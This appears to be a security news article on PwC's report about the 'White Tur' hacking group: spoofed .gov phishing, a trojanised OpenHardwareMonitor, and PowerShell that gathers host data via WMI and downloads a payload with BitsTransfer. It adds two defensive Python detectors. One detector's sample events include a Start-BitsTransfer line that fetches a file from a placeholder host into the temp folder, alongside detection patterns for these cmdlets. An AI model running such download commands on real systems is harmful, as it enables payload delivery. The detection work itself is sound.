‘White Tur’ Hacking Group Borrows Techniques From Multiple APTs

A newly detailed threat actor has been observed employing various techniques borrowed from multiple advanced persistent threat (APT) actors, PwC’s cyber threat intelligence team reports.

Dubbed White Tur, the adversary hasn’t been attributed to a specific geography, although it appears to have been active since at least 2017.

As part of an attack identified in January 2021, the group registered the subdomain mail[.]mod[.]qov[.]rs to phish for the login credentials of Serbian Ministry of Defence employees.

The phishing domain had a TLS certificate using the term ‘qov’, which spoofs the word ‘gov’. The .gov spoofing technique was previously employed by APT actors such as Russia-linked Sofacy (also known as APT28).
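One defensive check this technique suggests is a lookalike scan over the hostnames an organisation sees in certificate-transparency or DNS logs, flagging labels that imitate a protected label such as 'gov' through character substitution or a one-character edit. The code below is an added example written for this article; it is not PwC's or SecurityWeek's code. The reported phishing host is the first sample entry, the other hostnames, the confusables table and the protected-label list are constructed assumptions.

```python
from typing import Dict, List, Tuple

# Constructed sample of observed hostnames (e.g. from certificate transparency or DNS logs).
# The first entry reproduces the phishing host reported by PwC; the rest are made up.
SAMPLE_HOSTNAMES = [
    "mail.mod.qov.rs",
    "mail.mod.gov.rs",
    "portal.g0v.example",
    "www.example.com",
    "login.govv.example",
]

# Labels worth protecting; 'gov' is the one the article discusses (assumption: extend as needed).
PROTECTED_LABELS = ("gov",)

# Hand-built table of visually confusable substrings (assumption, not exhaustive).
CONFUSABLES: Dict[str, str] = {"q": "g", "0": "o", "1": "l", "vv": "w", "rn": "m"}


def normalize_label(label: str) -> str:
    """Replace confusable substrings with the character they imitate."""
    out = label.lower()
    for fake, real in CONFUSABLES.items():
        out = out.replace(fake, real)
    return out


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one-character insertions, deletions or swaps."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_labels(
    hostname: str, protected=PROTECTED_LABELS, max_distance: int = 1
) -> List[Tuple[str, str, str]]:
    """Return (label, protected_label, reason) for each label that imitates a protected label."""
    findings: List[Tuple[str, str, str]] = []
    for label in hostname.lower().split("."):
        for target in protected:
            if label == target:
                continue  # the genuine label is not a lookalike
            if normalize_label(label) == target:
                findings.append((label, target, "confusable-characters"))
            elif edit_distance(label, target) <= max_distance:
                findings.append((label, target, f"edit-distance<={max_distance}"))
    return findings


def scan(hostnames) -> Dict[str, List[Tuple[str, str, str]]]:
    """Map each hostname to its findings; hostnames with no findings are omitted."""
    results: Dict[str, List[Tuple[str, str, str]]] = {}
    for host in hostnames:
        findings = lookalike_labels(host)
        if findings:
            results[host] = findings
    return results


if __name__ == "__main__":
    for host, findings in scan(SAMPLE_HOSTNAMES).items():
        print(host, findings)
```

The edit-distance rule is deliberately tight (one edit) because short labels such as 'gov' are close to many harmless three-letter strings; the confusables table carries most of the signal, and a real deployment would feed flagged hostnames into a review queue rather than block on them automatically.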

The adversary was also observed abusing the open source project OpenHardwareMonitor for payload execution. For that, it injected code into the legitimate tool, using a technique previously employed by North Korea-based threat actor ZINC.

“As part of the attack, PowerShell code retrieves environmental information from the victim using PowerShell WMI objects and utilises the BitsTransfer Module available in PowerShell to download a payload,” PwC says.
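The combination PwC describes, WMI-based host reconnaissance followed by a BitsTransfer download in the same PowerShell session, is a correlation a detection engineer can express over script-block log events. The following is an added example written for this article, not code from PwC or SecurityWeek; the event records are constructed to resemble script-block logging output, and the session identifiers, cmdlet patterns and placeholder URL are assumptions.

```python
import re
from typing import Dict, List, Set

# Constructed script-block log events (one dict per logged block), not real telemetry.
# Session A spreads reconnaissance and download across separate events, as a script
# run line by line would; sessions B-D contain only one of the two behaviours.
SAMPLE_EVENTS = [
    {"session": "A", "text": "Import-Module BitsTransfer"},
    {"session": "A", "text": "$os = Get-WmiObject Win32_OperatingSystem"},
    {"session": "A", "text": "Start-BitsTransfer -Source http://placeholder.invalid/x -Destination $env:TEMP\\x.bin"},
    {"session": "B", "text": "Get-CimInstance Win32_ComputerSystem | Select-Object Name, Domain"},
    {"session": "C", "text": "Start-BitsTransfer -Source https://updates.example/patch.msu -Destination C:\\Updates\\patch.msu"},
    {"session": "D", "text": "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }"},
]

# Cmdlet patterns for each stage (assumption: a starting set, not an exhaustive list).
STAGE_PATTERNS: Dict[str, List[str]] = {
    "recon": [r"\bGet-WmiObject\b", r"\bGet-CimInstance\b", r"\bgwmi\b"],
    "download": [r"\bStart-BitsTransfer\b", r"\bImport-Module\s+BitsTransfer\b"],
}


def stages_in_block(text: str) -> Set[str]:
    """Return the set of stage names whose patterns appear in one script block."""
    found: Set[str] = set()
    for stage, patterns in STAGE_PATTERNS.items():
        if any(re.search(p, text, re.IGNORECASE) for p in patterns):
            found.add(stage)
    return found


def stages_by_session(events) -> Dict[str, Set[str]]:
    """Union the stages seen across all blocks logged for each session."""
    per_session: Dict[str, Set[str]] = {}
    for event in events:
        per_session.setdefault(event["session"], set()).update(stages_in_block(event["text"]))
    return per_session


def alerting_sessions(events) -> List[str]:
    """Sessions in which both reconnaissance and a BITS download were observed."""
    required = set(STAGE_PATTERNS)
    return sorted(s for s, stages in stages_by_session(events).items() if required <= stages)


if __name__ == "__main__":
    print("alert on sessions:", alerting_sessions(SAMPLE_EVENTS))
```

Correlating at the session level matters because a single-event rule would miss scripts whose reconnaissance and download land in different log entries, while a rule on `Start-BitsTransfer` alone would fire on legitimate patching such as session C. Script-block logging has to be enabled for any of this to exist in the logs, so confirming that setting is the first step.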

White Tur’s portfolio also includes macro-enabled documents containing various exploits and governmental, defense, R&D, and telecoms themes; HTA and XSL scripts; PowerShell scripts; and a Jscript backdoor.

The threat actor was also observed employing a backdoor packaged as a DLL, which allows it to manage files, upload and download files, execute commands, and set malware sleep time. This, PwC says, is “the most functional backdoor” in White Tur’s arsenal.

In the backdoor’s PDB path, the researchers also found the name Storm Kitty, which is an open-source malware project designed to capture credentials and log keystrokes.

PwC says attributing the activity of White Tur to a specific adversary is difficult because the target region doesn’t have much coverage in threat intelligence blogs: “from our assessment, this particular threat actor has a range of motivations with no clear links to well-known threat actors which are attributed to a government or organisation.”

Related: Sophisticated Threat Actor Targets Governments, Defense Industry in Western Asia

Related: Russian Cyberspy Groups Start Exploiting Log4Shell Vulnerability

Related: North Korean Hackers Abuse Windows Update Client in Attacks on Defense Industry

Written By

Ionut Arghire is an international correspondent for SecurityWeek.